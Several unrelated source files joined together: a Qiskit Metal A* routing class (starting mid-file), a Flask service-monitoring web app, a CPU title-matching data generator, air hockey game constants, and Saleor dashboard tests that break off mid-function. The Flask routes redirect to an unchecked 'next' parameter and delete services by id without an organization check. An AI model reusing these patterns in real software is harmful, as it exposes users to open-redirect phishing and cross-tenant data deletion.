* advanced: Dict
* avoid_collision: 'false' -- true/false, defines if the route needs to avoid collisions
Default Options:
* step_size: '0.25mm' -- Length of the step for the A* pathfinding algorithm
* advanced: Dict
* avoid_collision: 'true' -- true/false, defines if the route needs to avoid collisions
"""
default_options = Dict(step_size='0.25mm',
advanced=Dict(avoid_collision='true'))
"""Default options"""
TOOLTIP = """ Non-meandered CPW class that combines A* pathfinding algorithm with
simple 1-, 2-, or S-shaped segment checks and user-specified anchor points."""
def connect_astar_or_simple(self, start_pt: QRoutePoint,
end_pt: QRoutePoint) -> list:
"""Connect start and end via A* algo if connect_simple doesn't work.
Args:
start_direction (np.array): Vector indicating direction of starting point
start (np.array): 2-D coordinates of first anchor
end (np.array): 2-D coordinates of second anchor
Returns:
List of vertices of a CPW going from start to end
Raises:
QiskitMetalDesignError: If the connect_simple() has failed.
"""
start_direction = start_pt.direction
start = start_pt.position
end_direction = end_pt.direction
end = end_pt.position
step_size = self.parse_options().step_size
starting_dist = sum(
abs(end - start)) # Manhattan distance between start and end
key_starting_point = (starting_dist, start[0], start[1])
pathmapper = {key_starting_point: [starting_dist, [start]]}
# pathmapper maps tuple(total length of the path from self.start + Manhattan distance to destination, coordx, coordy) to [total length of
# path from self.start, path]
visited = set(
) # maintain record of points we've already visited to avoid self-intersections
visited.add(tuple(start))
# TODO: add to visited all of the current points in the route, to prevent self intersecting
priority_queue = list() # A* priority queue. Implemented as heap
priority_queue.append(key_starting_point)
# Elements in the heap are ordered by the following:
# 1. The total length of the path from self.start + Manhattan distance to destination
# 2. The x coordinate of the latest point
# 3. The y coordinate of the latest point
while priority_queue:
tot_dist, x, y = heapq.heappop(
priority_queue
) # tot_dist is the total length of the path from self.start + Manhattan distance to destination
length_travelled, current_path = pathmapper[(tot_dist, x, y)]
# Look in forward, left, and right directions a fixed distance away.
# If the line segment connecting the current point and this next one does
# not collide with any bounding boxes in design.components, add it to the
# list of neighbors.
neighbors = list()
if len(current_path) == 1:
# At starting point -> initial direction is start direction
direction = start_direction
else:
# Beyond starting point -> look at vector difference of last 2 points along path
direction = current_path[-1] - current_path[-2]
# The dot product between direction and the vector connecting the current
# point and a potential neighbor must be non-negative to avoid retracing.
# Check if connect_simple works at each iteration of A*
try:
simple_path = self.connect_simple(
QRoutePoint(np.array([x, y]), direction),
QRoutePoint(end, end_direction))
except QiskitMetalDesignError:
simple_path = None
# try the pathfinder algorithm
pass
if simple_path is not None:
current_path.extend(simple_path)
return current_path
for disp in [
np.array([0, 1]),
np.array([0, -1]),
np.array([1, 0]),
np.array([-1, 0])
]:
# Unit displacement in 4 cardinal directions
if mao.dot(disp, direction) >= 0:
# Ignore backward direction
curpt = current_path[-1]
nextpt = curpt + step_size * disp
if self.unobstructed([curpt, nextpt]):
neighbors.append(nextpt)
for neighbor in neighbors:
if tuple(neighbor) not in visited:
new_remaining_dist = sum(abs(end - neighbor))
new_length_travelled = length_travelled + step_size
new_path = current_path + [neighbor]
if new_remaining_dist < 10**-8:
# Destination has been reached within acceptable error tolerance (errors due to rounding in Python)
return new_path[:-1] + [
end
] # Replace last element of new_path with end since they're basically the same
heapq.heappush(priority_queue,
(new_length_travelled + new_remaining_dist,
neighbor[0], neighbor[1]))
pathmapper[(new_length_travelled + new_remaining_dist,
neighbor[0], neighbor[1])] = [
new_length_travelled, new_path
]
visited.add(tuple(neighbor))
return [
] # Shouldn't actually reach here - if it fails, there's a convergence issue
def make(self):
"""Generates path from start pin to end pin."""
p = self.parse_options()
anchors = p.anchors
# Set the CPW pins and add the points/directions to the lead-in/out arrays
self.set_pin("start")
self.set_pin("end")
# Align the lead-in/out to the input options set from the user
start_point = self.set_lead("start")
end_point = self.set_lead("end")
self.intermediate_pts = OrderedDict()
for arc_num, coord in anchors.items():
arc_pts = self.connect_astar_or_simple(self.get_tip(),
QRoutePoint(coord))
if arc_pts is None:
self.intermediate_pts[arc_num] = [coord]
else:
self.intermediate_pts[arc_num] = np.concatenate(
[arc_pts, [coord]], axis=0)
arc_pts = self.connect_astar_or_simple(self.get_tip(), end_point)
if arc_pts is not None:
self.intermediate_pts[len(anchors)] = np.array(arc_pts)
# concatenate all points, transforming the dictionary into a single numpy array
self.trim_pts()
self.intermediate_pts = np.concatenate(list(
self.intermediate_pts.values()),
axis=0)
# Make points into elements
self.make_elements(self.get_points())
|
from flask import Flask, session, request, flash, url_for, redirect, render_template, abort, g, jsonify, Response
from flask_login import login_user, logout_user, current_user, login_required
from webapp import db, app, login_manager, UserType, recaptcha
from .models import *
import sendgrid
import os
from sendgrid.helpers.mail import *
import bcrypt
import datetime
from tables import UsersTable, ServicesTable, HistoryTable, StatisticsTable, StatItem
from functions import generate_registration_token, confirm_token, notification_fix, send_notification
import json
from bson import json_util
from flask_recaptcha import ReCaptcha
@login_manager.user_loader
def load_user(id):
return User.query.get(int(id))
@app.route('/')
@app.route('/index')
@login_required
def index():
return redirect(url_for('dashboard'))
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('login'))
@app.before_request
def before_request():
g.user = current_user
@app.route('/test_service')
def test_service():
#return "Internal Server Error", 500
return "OK!", 200
@app.route('/login',methods=['GET','POST'])
def login():
# display login template
if request.method == 'GET':
return render_template('login.html', title="DevOps")
# get input values from template
email = request.form['email']
password = request.form['password']
# get user from db by email
registered_user = User.query.filter_by(email=email).first()
# check if user with given email exists in db
if registered_user is None:
flash('The user does not exist!' , 'error')
return redirect(url_for('login'))
# checking encrypted password
check_pass = bcrypt.checkpw(password.encode(), registered_user.password.encode())
# check if password is correct and user is admin
org_usr_mapp = User_Organization_mapping.query.filter_by(id_user=registered_user.id).first()
if check_pass == False or org_usr_mapp.user_type != UserType.adm:
flash('Email or Password is invalid' , 'error')
return redirect(url_for('login'))
# login user
login_user(registered_user)
flash('Logged in successfully')
return redirect(request.args.get('next') or url_for('dashboard'))
@app.route('/register/<token>/<organization_id>' , methods=['GET','POST'])
def register(token, organization_id):
pushed_token = Tokens.query.filter_by(token=token).first()
# check if token expired
expiration_date = pushed_token.date_of_expire + datetime.timedelta(days=7)
if expiration_date <= datetime.datetime.now():
if request.method == 'GET':
return "Brak dostepu! Token wygasl!"
if request.method == 'GET':
if pushed_token is None or pushed_token.is_used == True:
return "Brak dostepu!"
# register user which already exist in db
email = confirm_token(token)
user = User.query.filter_by(email=email).first()
if user is not None:
org_usr_mapp=User_Organization_mapping(id_user=user.id, id_organization=organization_id, user_type=2)
db.session.add(org_usr_mapp)
pushed_token.is_used = True
db.session.commit()
flash('User successfully registered')
return "You are register to other organization! Now you joined to this organization too."
if request.method == 'GET':
return render_template('register.html', title="DevOps", registerAdmin="false")
if recaptcha.verify():
name = request.form['name']
surname = request.form['surname']
password = request.form['password']
password_bytes = password.encode('utf-8')
hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())
# register new user
user=User(name=name, surname=surname, email=email, password=<PASSWORD>)
db.session.add(user)
db.session.commit()
org_usr_mapp=User_Organization_mapping(id_user=user.id, id_organization=organization_id, user_type=2)
db.session.add(org_usr_mapp)
pushed_token.is_used = True
db.session.commit()
flash('User successfully registered')
return "Your account is ready for login. Go to your Android app and try this on!"
else:
return render_template("register.html", title="DevOps", registerAdmin="false", captcha="failed")
@app.route('/remove_service', methods=['GET', 'POST'])
@login_required
def remove_service():
if request.method == 'POST':
id = request.args.get('id')
subscriptions=Subscription.query.filter_by(id_service=id).all()
serv=Service.query.filter_by(id=id).first()
for sub in subscriptions:
db.session.delete(sub)
db.session.delete(serv)
db.session.commit()
return redirect(request.args.get('next') or url_for('services'))
@app.route('/remove_user', methods=['GET', 'POST'])
@login_required
def remove_user():
if request.method == 'POST':
id = request.args.get('id')
org = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
services_of_organization = Service.query.filter_by(organization_id=org.id_organization).all()
subscriptions = Subscription.query.filter_by(id_user=id).all()
membership_to_organization = User_Organization_mapping.query.filter_by(id_user=id, id_organization=org.id_organization).first()
# we have to delete just a subscriptions of services which are belong to organization from which we remove user
for sub in subscriptions:
for serv in services_of_organization:
if sub.id_service == serv.id:
db.session.delete(sub)
# we remove a user just from admin's organization and just if that user is not an admin
if membership_to_organization.user_type != UserType.adm:
db.session.delete(membership_to_organization)
user = User.query.filter_by(id=id).first()
# if user do not belong to any organization we remove him
if user.organizations == []:
db.session.delete(user)
db.session.commit()
return redirect(request.args.get('next') or url_for('users'))
#admin registration
@app.route('/register' , methods=['GET','POST'])
def register_admin():
if request.method == 'GET':
return render_template('register.html', title="DevOps", registerAdmin="true")
if recaptcha.verify():
email = request.form['email']
name = request.form['name']
organization = request.form['organization']
if Organization.query.filter_by(name=organization).first() is not None:
return redirect(request.args.get('next') or url_for('register_admin'))
surname = request.form['surname']
password = request.form['password']
password_bytes = password.encode('utf-8')
hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())
user=User(name=name, surname=surname, email=email, password=hashed)
org_usr_mapp=User_Organization_mapping(user_type=1)
org_usr_mapp.organization=Organization(name=organization)
user.organizations.append(org_usr_mapp)
db.session.add(user)
db.session.add(org_usr_mapp)
db.session.commit()
# set token as USED
flash('User successfully registered')
return redirect(request.args.get('next') or url_for('login'))
else:
return render_template('register.html', title="DevOps", registerAdmin="true", captcha="failed")
@app.route('/users',methods=['GET','POST'])
@login_required
def users():
# get id_organization of specific admin
org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
# display invite template
if request.method == 'GET':
# creating a table of users
items = db.session.query(User_Organization_mapping).filter_by(id_organization=org_id.id_organization).all()
users_table = UsersTable(items)
return render_template('users.html', users_table=users_table, panel="users", org_name=org_id.organization.name)
@app.errorhandler(404)
def page_not_found(error):
return 'fail'
@app.route('/loginandroid',methods=['GET','POST'])
def loginandroid():
if request.method == 'GET':
return "Brak dostepu!", 403
email = request.form['email']
password = request.form['password']
fcm_token = request.form['fcm_token']
registered_user = User.query.filter_by(email=email).first()
if registered_user is None:
flash('The user does not exist!' , 'error')
return "Uzytkownik nie istnieje", 403
check_pass = bcrypt.checkpw(password.encode(), registered_user.password.encode())
if check_pass == False:
flash('Email or Password is invalid' , 'error')
return "B<NAME>", 403
login_user(registered_user)
flash('Logged in successfully')
registered_user.fcm_token = fcm_token
db.session.commit()
return jsonify({
"error": False,
"uid": registered_user.id,
"user": {
"name": registered_user.name,
"surname": registered_user.surname,
"email": registered_user.email,
"fcm_token": registered_user.fcm_token
}
}), 200
@app.route('/logoutandroid')
def logoutandroid():
logout_user()
return "Success", 200
@app.route('/servicesandroid')
def servicesandroid():
if current_user.is_authenticated():
items=[]
users=User_Organization_mapping.query.filter_by(id_user=g.user.id).all()
for x in users:
items = items + Service.query.filter_by(organization_id=x.id_organization).all()
#org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
#items=db.session.query(Service).filter_by(organization_id=org_id.id_organization).all()
return Response((json.dumps([o.dump() for o in items], default=json_util.default)), mimetype='application/json')
else:
return "Blad", 400
@app.route('/subscriptionandroid', methods=['GET', 'POST'])
def subscriptionandroid():
if current_user.is_authenticated():
if request.method == 'GET':
items=db.session.query(Subscription).filter_by(id_user=g.user.id).all()
return Response((json.dumps([o.dump() for o in items], default=json_util.default)), mimetype='application/json')
json_dict = request.get_json()
id = json_dict['id']
status = json_dict['status']
if status == "remove":
get_sub = Subscription.query.filter_by(id_user=g.user.id, id_service=id).first()
if get_sub != None:
db.session.delete(get_sub)
db.session.commit()
return "Success", 200
elif status == "add":
if Subscription.query.filter_by(id_user=g.user.id, id_service=id).first() is None:
sub=Subscription(id_user=g.user.id, id_service=id, status=1)
db.session.add(sub)
db.session.commit()
return "Success", 200
else:
return "You've already subscribed this service", 400
else:
return "Bad request", 400
else:
return "Blad", 400
@app.route('/dashboard', methods=['GET','POST'])
@login_required
def dashboard():
user = g.user
org_id = User_Organization_mapping.query.filter_by(id_user=user.id).first()
up_services = Service.query.filter_by(organization_id=org_id.id_organization, current_state=ServiceState.up).count()
down_services = Service.query.filter_by(organization_id=org_id.id_organization, current_state=ServiceState.down).count()
unspecified_services = Service.query.filter_by(organization_id=org_id.id_organization, current_state=ServiceState.unspecified).count()
all_services = Service.query.filter_by(organization_id=org_id.id_organization).count()
if all_services != 0:
percent_up_services = int(float(up_services)/float(all_services)*100)
percent_down_services = int(float(down_services)/float(all_services)*100)
percent_unspecified_services = int(float(unspecified_services)/float(all_services)*100)
else:
percent_up_services = 0
percent_down_services = 0
percent_unspecified_services = 0
if percent_up_services + percent_down_services + percent_unspecified_services < 100:
if percent_up_services != 0:
percent_up_services = percent_up_services + 1
elif percent_down_services != 0:
percent_down_services = percent_down_services + 1
elif percent_unspecified_services != 0:
percent_unspecified_services = percent_unspecified_services + 1
return render_template('dashboard.html', title="DevOps Nokia Project", user=user, panel="dashboard", org_name=org_id.organization.name, percent_up_services=percent_up_services, percent_down_services=percent_down_services, percent_unspecified_services=percent_unspecified_services)
@app.route('/services', methods=['GET','POST'])
@login_required
def services():
org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
if request.method == 'GET':
# creating a table of services
items = db.session.query(Service).filter_by(organization_id=org_id.id_organization).all()
services_table = ServicesTable(items)
return render_template('services.html', services_table=services_table, panel="services", org_name=org_id.organization.name)
@app.route('/invite',methods=['GET','POST'])
@login_required
def invite():
admin_org = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
if request.method == 'GET':
return render_template('invite.html', panel="invite")
# get email from template
email = request.form['email']
# checking if user exists in current organization
user = User.query.filter_by(email=email).first()
if user is not None:
for org in user.organizations:
if org.id_organization == admin_org.id_organization:
return render_template('invite.html', panel="invite", exist="Ten e-mail juz istnieje w biezacej organizacji!!!")
# create a client for sending emails
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
# email's data
from_email = Email("<EMAIL>")
subject = "You got invited to awesome app!"
to_email = Email(email)
content = Content("text/plain", "Hello, World!")
# generates token for an email
token=Tokens(token=generate_registration_token(email), email=email, date=datetime.datetime.now()+datetime.timedelta(days=7))
content = Content("text/plain", "Hello! You've got invited to DevOps project. To continue "+
"the registration click this link: "+
"https://devops-nokia.herokuapp.com/register/"+token.token+"/"+str(admin_org.id_organization)+
" You have 7 days for sign up, after that your token will be deactivated.")
# creatin the mail
mail = Mail(from_email, subject, to_email, content)
# sending the email
response = sg.client.mail.send.post(request_body=mail.get())
db.session.add(token)
db.session.commit()
flash('E-mail sent successfully')
return redirect(request.args.get('next') or url_for('users'))
@app.route('/add_service',methods=['GET','POST'])
@login_required
def add_service():
org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
if request.method == 'GET':
return render_template('add_service.html', panel="add_service")
# get the values from the template
address = request.form['service_address']
name = request.form['service_name']
# adding required prefix 'http://' if do not exist
if address[0:7] != 'http://' and address[0:8] != 'https://':
address = 'http://' + address
# checking if a service with a given address or name does not exist
address_check = Service.query.filter_by(address=address, organization_id=org_id.id_organization).first()
name_check = Service.query.filter_by(name=name, organization_id=org_id.id_organization).first()
# if exists redirect to the error page
if address_check or name_check:
return redirect(url_for('add_service'))
# creating a new service
new_service = Service(address=address, name=name,time_of_added=datetime.datetime.now(), organization_id=org_id.id_organization)
db.session.add(new_service)
db.session.commit()
return redirect(request.args.get('next') or url_for('services'))
@app.route('/settings',methods=['GET','POST'])
@login_required
def settings():
org = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
if request.method == 'GET':
return render_template('settings.html', org_name=org.organization.name)
org_name = request.form['organization_name']
if Organization.query.filter_by(name=org_name).first() is None:
org.organization.name = org_name
old_password = request.form['old_password']
check_pass = bcrypt.checkpw(old_password.encode(), g.user.password.encode())
if check_pass:
password = request.form['password']
password_bytes = password.encode('utf-8')
hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())
g.user.password = hashed
db.session.commit()
return redirect(request.args.get('next') or url_for('settings'))
@app.route('/fix_service',methods=['GET','POST'])
def fix_android():
if current_user.is_authenticated():
if request.method == 'GET':
return "Blad", 400
json_dict = request.get_json()
service_id = json_dict['service_id']
in_repairing = json_dict['in_repairing']
get_serv = Service.query.filter_by(id=service_id).first()
if in_repairing == True:
if get_serv != None and get_serv.service_repairer_id == None:
get_serv.service_repairer_id = g.user.id
db.session.commit()
notification_fix( "icon_yellow", get_serv )
return "Success", 200
else:
return "Bad request", 400
elif in_repairing == False:
if get_serv != None and get_serv.service_repairer_id != None:
get_serv.service_repairer_id = None
db.session.commit()
send_notification( "icon_red", get_serv, "DOWN" )
return "Success", 200
else:
return "Bad request", 400
else:
return "Bad request", 400
else:
return "Blad", 400
@app.route('/stats_android')
def stats_android():
if current_user.is_authenticated():
up_services=0
down_services=0
unspecified_services=0
all_services=0
users=User_Organization_mapping.query.filter_by(id_user=g.user.id).all()
for x in users:
up_services = up_services + Service.query.filter_by(organization_id=x.id_organization, current_state=ServiceState.up).count()
down_services = down_services + Service.query.filter_by(organization_id=x.id_organization, current_state=ServiceState.down).count()
unspecified_services = unspecified_services + Service.query.filter_by(organization_id=x.id_organization, current_state=ServiceState.unspecified).count()
all_services = all_services + Service.query.filter_by(organization_id=x.id_organization).count()
if all_services != 0:
percent_up_services = int(float(up_services)/float(all_services)*100)
percent_down_services = int(float(down_services)/float(all_services)*100)
percent_unspecified_services = int(float(unspecified_services)/float(all_services)*100)
else:
percent_up_services = 0
percent_down_services = 0
percent_unspecified_services = 0
if percent_up_services + percent_down_services + percent_unspecified_services < 100:
if percent_up_services != 0:
percent_up_services = percent_up_services + 1
elif percent_down_services != 0:
percent_down_services = percent_down_services + 1
elif percent_unspecified_services != 0:
percent_unspecified_services = percent_unspecified_services + 1
items={"up":percent_up_services, "down":percent_down_services, "unspecified":percent_unspecified_services}
return Response((json.dumps(items, default=json_util.default)), mimetype='application/json')
else:
return "Blad", 400
@app.route('/history',methods=['GET','POST'])
@login_required
def history():
org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
if request.method == 'GET':
# creating a history table
items = db.session.query(History).filter_by(organization_id=org_id.id_organization).all()
history_table = HistoryTable(items)
return render_template('history.html', history_table=history_table, panel="history", org_name=org_id.organization.name)
@app.route('/statistics',methods=['GET','POST'])
@login_required
def statistics():
org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
if request.method == 'GET':
# creating a statistic table
items = []
for service in Service.query.filter_by(organization_id=org_id.id_organization).all():
if service.current_state == ServiceState.up:
timedelta_uptime = datetime.datetime.now() - service.time_of_last_change_of_state
timedelta_uptime = str(timedelta_uptime).split(".")[0]
delta_uptime = (datetime.datetime.now() - service.time_of_last_change_of_state).seconds
else:
timedelta_uptime = '00:00:00'
delta_uptime = (datetime.datetime.now() - service.time_of_added).seconds - (datetime.datetime.now() - service.time_of_last_change_of_state).seconds
delta_time_of_added = (datetime.datetime.now() - service.time_of_added).seconds
percentage_uptime = int(float(delta_uptime) / float(delta_time_of_added) * 100.0)
items.append(StatItem(service.name, timedelta_uptime, percentage_uptime))
statistics_table = StatisticsTable(items)
return render_template('statistics.html', statistics_table=statistics_table, panel="statistics", org_name=org_id.organization.name)
|
<gh_stars>10-100
import pandas as pd
import os
from tqdm import tqdm
import random
from itertools import combinations
from supervised_product_matching.model_preprocessing import remove_stop_words
from src.common import create_final_data
def cpu_variations(cpu):
'''
Creates different forms of a cpu title
Ex: amd ryzen 5 3600, amd ryzen 5 3600 6 core processor,
amd ryzen 5 3600 3.6 ghz processor and ryzen 5 3600 6 core 3.6 ghz processor.
'''
temp = []
# This would be something like 'amd ryzen 5 3600 6 cores 3.6 ghz processor'
temp.append(remove_stop_words('{} {} core {} processor'.format(cpu['name'], cpu['cores'], cpu['core_clock'])))
# Just the base 'amd ryzen 5 3600'
temp.append(remove_stop_words(cpu['name']))
# Add in only cores 'amd ryzen 5 3600 6 core processor'
temp.append(remove_stop_words('{} {} core processor'.format(cpu['name'], cpu['cores'])))
# Add in only ghz 'amd ryzen 5 3600 3.6 ghz processor'
temp.append(remove_stop_words('{} {} processor'.format(cpu['name'], cpu['core_clock'])))
return temp
def generate_pos_cpu_data():
'''
Creates positive CPU data with different variations of the title that still
represent the same underlying CPU using the cpu_variations function.
'''
cpu_df = pd.read_csv('data/base/cpu_data.csv')
cpu_df_iloc = cpu_df.iloc()
pos_df = []
# The data is (name, cores, core_clock)
for idx in tqdm(range(len(cpu_df))):
# For creating combinations
temp = []
cpu = cpu_df_iloc[idx]
# Returns combos of the attributes of the CPU
temp = cpu_variations(cpu)
combs = list(combinations(temp, 2))
for comb in combs:
pos_df.append([comb[0], comb[1], 1])
return pd.DataFrame(pos_df, columns=['title_one', 'title_two', 'label'])
def generate_neg_cpu_data():
'''
Creates negative CPU data that uses two different CPUs to create a pair.
'''
cpu_df = pd.read_csv('data/base/cpu_data.csv')
cpu_df_iloc = cpu_df.iloc()
neg_df = []
for idx in tqdm(range(len(cpu_df))):
cpu = cpu_df_iloc[idx]
key_brand = 'amd'
# Placeholder for now
neg_cpu = cpu
if 'amd' in cpu['name'].lower():
if random.random() > 0.65:
key_brand = 'amd'
else:
key_brand = 'intel'
elif 'intel' in cpu['name'].lower():
if random.random() > 0.65:
key_brand = 'intel'
else:
key_brand = 'amd'
# Get something that is similar to it
while key_brand not in neg_cpu['name'].lower() or cpu['name'] == neg_cpu['name']:
neg_cpu = cpu_df_iloc[random.randrange(0, len(cpu_df))]
orig_variations = cpu_variations(cpu)
neg_variations = cpu_variations(neg_cpu)
# Get all the combinations between orig variations and neg variations
for orig_cpu in orig_variations:
for neg_variation in neg_variations:
neg_df.append([orig_cpu, neg_variation, 0])
return pd.DataFrame(neg_df, columns=['title_one', 'title_two', 'label'])
def create_general_cpu_data():
'''
Runs through generate_pos_cpu_data() and generate_neg_cpu_data() to create positive and negative data.
Saves the file to more_cpu_data.csv
'''
file_path = 'data/train/more_cpu_data.csv'
if not os.path.exists(file_path):
print('Generating general cpu data . . . ')
# Create the positive and negative examples
pos_df = generate_pos_cpu_data()
neg_df = generate_neg_cpu_data()
# Concatenate the data and save it
final_cpu_df = create_final_data(pos_df, neg_df)
final_cpu_df.to_csv(file_path)
else:
print('Already have general cpu data data. Moving on . . .')
|
<gh_stars>0
import pathlib
from game.casting.color import Color
"""
CONSTANTS: used to declare constants that will be used in the game
"""
# --------------------------------------------------------------------------------------------------
# GENERAL GAME CONSTANTS
# --------------------------------------------------------------------------------------------------
# GAME
GAME_NAME = "Air Hockey Game - Group 8"
FRAME_RATE = 60
# SCREEN
SCREEN_WIDTH = 1100
SCREEN_HEIGHT = 750
CENTER_X = SCREEN_WIDTH / 2
CENTER_Y = SCREEN_HEIGHT / 2
# FIELD
FIELD_TOP = 90
FIELD_BOTTOM = SCREEN_HEIGHT - 80
FIELD_LEFT = 30
FIELD_RIGHT = SCREEN_WIDTH - 30
GOAL_GROUP = "goals"
# LEFT
# GOAL_A
GOAL_TOP = 80
GOAL_BOTTOM = SCREEN_HEIGHT-10
GOAL_LEFT = 30
# RIGHT
# GOAL_B
GOAL_RIGHT = SCREEN_WIDTH - 81
# FONT
FONT_FILE = "air_hockey/assets/fonts/zorque.otf"
FONT_SMALL = 32
FONT_LARGE = 48
# SOUND
COUNTDOWN_A = "air_hockey/assets/sounds/countdown_a.wav"
COUNTDOWN_B = "air_hockey/assets/sounds/countdown_b.wav"
GOAL = "air_hockey/assets/sounds/goal.wav"
PUCK_DROP = "air_hockey/assets/sounds/puck_drop.wav"
SLIDE = "air_hockey/assets/sounds/slide.wav"
SLIDE_HIT = "air_hockey/assets/sounds/slide_hit.wav"
# TEXT
ALIGN_CENTER = 0
ALIGN_LEFT = 1
ALIGN_RIGHT = 2
# COLORS
BLACK = Color(0, 0, 0)
WHITE = Color(255, 255, 255)
PURPLE = Color(255, 0, 255)
# KEYS
A = "a"
S = "s"
D = "d"
W = "w"
LEFT = "left"
RIGHT = "right"
UP = "up"
DOWN = "down"
SPACE = "space"
ENTER = "enter"
PAUSE = "p"
# SCENES
NEW_GAME = 0
TRY_AGAIN = 1
IN_PLAY = 3
GAME_OVER = 4
# --------------------------------------------------------------------------------------------------
# SCRIPTING CONSTANTS
# --------------------------------------------------------------------------------------------------
# PHASES
INITIALIZE = 0
LOAD = 1
INPUT = 2
UPDATE = 3
OUTPUT = 4
UNLOAD = 5
RELEASE = 6
# --------------------------------------------------------------------------------------------------
# CASTING CONSTANTS
# --------------------------------------------------------------------------------------------------
# STATS
STATS_GROUP = "stats"
# HUD
HUD_MARGIN = 15
SCORE_GROUP = "score"
SCORE_FORMAT = "SCORE: {}"
PLAYER_A= "Player 1: {}"
PLAYER_B= "Player 2: {}"
# SURFACE
SURFACE_GROUP = "surface"
SURFACE_IMAGE = "air_hockey/assets/images/surface.png"
SURFACE_WIDTH = 1040
SURFACE_HEIGHT = 669
# PUCK
PUCK_GROUP = "pucks"
PUCK_IMAGE = "air_hockey/assets/images/puck.png"
PUCK_WIDTH = 50
PUCK_HEIGHT = 50
PUCK_VELOCITY = 6
# STRIKERS
STRIKER_GROUP = "striker"
STRIKER_GROUP2 = "striker2"
STRIKER_IMAGES = "air_hockey/assets/images/striker.png"
STRIKER2_IMAGES = "air_hockey/assets/images/striker2.png"
STRIKER_WIDTH = 100
STRIKER_HEIGHT = 99
STRIKER_RATE = 6
STRIKER_VELOCITY = 8
# DIALOG
DIALOG_GROUP = "dialogs"
ENTER_TO_START = "PRESS ENTER TO START"
FACEOFF = "FACEOFF"
WAS_GOOD_GAME = "GAME OVER"
|
<reponame>arslanahmd/Ghar-Tameer<gh_stars>0
from io import BytesIO
import json
from unittest.mock import Mock, MagicMock
from PIL import Image
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import HiddenInput
from django.urls import reverse
from django.utils.encoding import smart_text
import pytest
from saleor.dashboard.product import ProductBulkAction
from saleor.dashboard.product.forms import (
ProductBulkUpdate, ProductClassForm, ProductForm)
from saleor.product.forms import VariantChoiceField
from saleor.product.models import (
AttributeChoiceValue, Product, ProductAttribute, ProductClass,
ProductImage, ProductVariant, Stock, StockLocation)
HTTP_STATUS_OK = 200
HTTP_REDIRECTION = 302
def create_image():
img_data = BytesIO()
image = Image.new('RGB', size=(1, 1), color=(255, 0, 0, 0))
image.save(img_data, format='JPEG')
image_name = 'product2'
image = SimpleUploadedFile(
image_name + '.jpg', img_data.getvalue(), 'image/png')
return image, image_name
@pytest.mark.integration
@pytest.mark.django_db
def test_stock_record_update_works(admin_client, product_in_stock):
variant = product_in_stock.variants.get()
stock = variant.stock.order_by('-quantity_allocated').first()
quantity = stock.quantity
quantity_allocated = stock.quantity_allocated
url = reverse(
'dashboard:variant-stock-update',
kwargs={
'product_pk': product_in_stock.pk,
'variant_pk': variant.pk,
'stock_pk': stock.pk})
admin_client.post(url, {
'variant': stock.variant_id, 'location': stock.location.id,
'cost_price': stock.cost_price.net,
'quantity': quantity + 5})
new_stock = variant.stock.get(pk=stock.pk)
assert new_stock.quantity == quantity + 5
assert new_stock.quantity_allocated == quantity_allocated
def test_valid_product_class_form(color_attribute, size_attribute):
data = {
'name': "Testing Class",
'product_attributes': [color_attribute.pk],
'variant_attributes': [size_attribute.pk],
'has_variants': True}
form = ProductClassForm(data)
assert form.is_valid()
# Don't allow same attribute in both fields
data['variant_attributes'] = [color_attribute.pk, size_attribute.pk]
data['product_attributes'] = [size_attribute.pk]
form = ProductClassForm(data)
assert not form.is_valid()
def test_variantless_product_class_form(color_attribute, size_attribute):
data = {
'name': "Testing Class",
'product_attributes': [color_attribute.pk],
'variant_attributes': [],
'has_variants': False}
form = ProductClassForm(data)
assert form.is_valid()
# Don't allow variant attributes when no variants
data = {
'name': "Testing Class",
'product_attributes': [color_attribute.pk],
'variant_attributes': [size_attribute.pk],
'has_variants': False}
form = ProductClassForm(data)
assert not form.is_valid()
def test_edit_used_product_class(db):
product_class = ProductClass.objects.create(
name='New class', has_variants=True)
product = Product.objects.create(
name='Test product', price=10, product_class=product_class)
ProductVariant.objects.create(product=product, sku='1234')
# When all products have only one variant you can change
# has_variants to false
assert product.variants.all().count() == 1
data = {
'name': product_class.name,
'product_attributes': product_class.product_attributes.all(),
'variant_attributes': product_class.variant_attributes.all(),
'has_variants': False}
form = ProductClassForm(data, instance=product_class)
assert form.is_valid()
data = {
'name': product_class.name,
'product_attributes': product_class.product_attributes.all(),
'variant_attributes': product_class.variant_attributes.all(),
'has_variants': True}
form = ProductClassForm(data, instance=product_class)
assert form.is_valid()
# Test has_variants validator which prevents turning off when product
# has multiple variants
ProductVariant.objects.create(product=product, sku='12345')
assert product.variants.all().count() == 2
data = {
'name': product_class.name,
'product_attributes': product_class.product_attributes.all(),
'variant_attributes': product_class.variant_attributes.all(),
'has_variants': False}
form = ProductClassForm(data, instance=product_class)
assert not form.is_valid()
assert 'has_variants' in form.errors.keys()
def test_change_attributes_in_product_form(
db, product_in_stock, color_attribute):
product = product_in_stock
product_class = product.product_class
text_attribute = ProductAttribute.objects.create(
slug='author', name='Author')
product_class.product_attributes.add(text_attribute)
color_value = color_attribute.values.first()
new_author = 'Main Tester'
new_color = color_value.pk
data = {
'name': product.name,
'price': product.price.gross,
'categories': [c.pk for c in product.categories.all()],
'description': 'description',
'attribute-author': new_author,
'attribute-color': new_color}
form = ProductForm(data, instance=product)
assert form.is_valid()
product = form.save()
assert product.get_attribute(color_attribute.pk) == smart_text(new_color)
assert product.get_attribute(text_attribute.pk) == new_author
def test_attribute_list(db, product_in_stock, color_attribute, admin_client):
assert len(ProductAttribute.objects.all()) == 2
response = admin_client.get(reverse('dashboard:product-attributes'))
assert response.status_code == 200
def test_attribute_detail(color_attribute, admin_client):
url = reverse('dashboard:product-attribute-detail',
kwargs={'pk': color_attribute.pk})
response = admin_client.get(url)
assert response.status_code == 200
def test_attribute_add(color_attribute, admin_client):
